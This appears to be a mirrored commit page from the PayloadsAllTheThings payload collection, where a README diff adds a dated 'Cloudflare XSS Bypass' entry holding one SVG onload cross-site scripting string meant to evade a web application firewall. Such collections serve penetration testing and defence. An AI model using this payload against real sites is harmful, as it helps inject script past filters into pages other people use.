mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Update README.md
Added Cloudflare XSS bypass
This commit is contained in:
parent
bd9378cab7
commit
4b38516e3b
1 changed files with 6 additions and 0 deletions
|
@ -817,6 +817,12 @@ Works for CSP like `script-src self`
|
|||
|
||||
## Common WAF Bypass
|
||||
|
||||
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
|
||||
|
||||
```
|
||||
<svg/onload=alert()//
|
||||
```
|
||||
|
||||
### Cloudflare XSS Bypass - 27th february 2018
|
||||
|
||||
```html
|
||||
|
|
Loading…
Reference in a new issue